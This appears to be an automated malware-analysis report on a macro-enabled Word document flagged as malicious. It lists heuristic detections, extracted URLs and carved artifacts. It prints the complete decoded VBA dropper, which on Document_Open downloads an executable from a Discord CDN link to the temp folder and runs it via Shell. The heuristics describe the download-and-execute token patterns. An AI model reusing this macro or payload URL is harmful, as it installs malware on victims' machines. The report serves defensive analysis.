MALICIOUS
258
Risk Score
Heuristics 9
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (savePath) -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
adoStream.Write xmlHttpRequest.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xmlHttpRequest = CreateObject("MSXML2.XMLHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
savePath = Environ$("tmp") & "\downloaded_file.exe" -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://cdn.discordapp.com/attachments/1265592680700711006/1265595644031270992/VVCGHHDYTR.exe?ex=66a2154b&is=66a0c3cb&hm=9935ad5bc1809f433d2cb81e4a36dea7a9b4a898c7a33ace01437a98095b4a22& Referenced by macro
- https://cdn.discordapp.com/attachments/1265592680700711006/1265595644031270992/VVCGHHDYTR.exe?ex=66a2154b&is=66a0c3cb&hm=9935ad5bc1809f433d2cb81e4a36dea7a9b4a898c7a33ace01437a98095b4a22&�Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2378 bytes |
SHA-256: bad9f62ac721a367057e1f0332c82e0ff13f5d8f85a2129056d3f1c5a800f0f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Const DOWNLOAD_URL As String = "https://cdn.discordapp.com/attachments/1265592680700711006/1265595644031270992/VVCGHHDYTR.exe?ex=66a2154b&is=66a0c3cb&hm=9935ad5bc1809f433d2cb81e4a36dea7a9b4a898c7a33ace01437a98095b4a22&"
Dim xmlHttpRequest As Object
Dim adoStream As Object
Dim savePath As String
Dim downloadSuccess As Boolean
On Error GoTo ErrorHandler
' Initialize variables
downloadSuccess = False
savePath = Environ$("tmp") & "\downloaded_file.exe"
' Create XMLHTTP object to send HTTP request
Set xmlHttpRequest = CreateObject("MSXML2.XMLHTTP")
xmlHttpRequest.Open "GET", DOWNLOAD_URL, False
xmlHttpRequest.send
' Check if the HTTP request was successful (status 200)
If xmlHttpRequest.Status = 200 Then
' Create ADODB Stream object to handle binary data
Set adoStream = CreateObject("ADODB.Stream")
adoStream.Open
adoStream.Type = 1 ' Binary data
' Write the response body to the stream
adoStream.Write xmlHttpRequest.ResponseBody
adoStream.Position = 0
' Save the file and close the stream
adoStream.SaveToFile savePath, 2 ' Overwrite if file exists
adoStream.Close
downloadSuccess = True
End If
' Clean up XMLHTTP object
Set xmlHttpRequest = Nothing
' Execute the downloaded file if download was successful
If downloadSuccess Then
Shell (savePath)
End If
Exit Sub
ErrorHandler:
' Error handling code
MsgBox "An error occurred: " & Err.Description, vbCritical, "Error"
On Error Resume Next
' Ensure the objects are cleaned up in case of error
If Not adoStream Is Nothing Then
adoStream.Close
Set adoStream = Nothing
End If
If Not xmlHttpRequest Is Nothing Then
Set xmlHttpRequest = Nothing
End If
End Sub
Attribute VB_Name = "NewMacros"
Sub tttt()
'
' tttt Macro
'
'
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 14848 bytes |
SHA-256: 2b80d43a85bc140ce439bb1c55679cfa5cf397bded661eb4b4dd5e471cd144fb |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.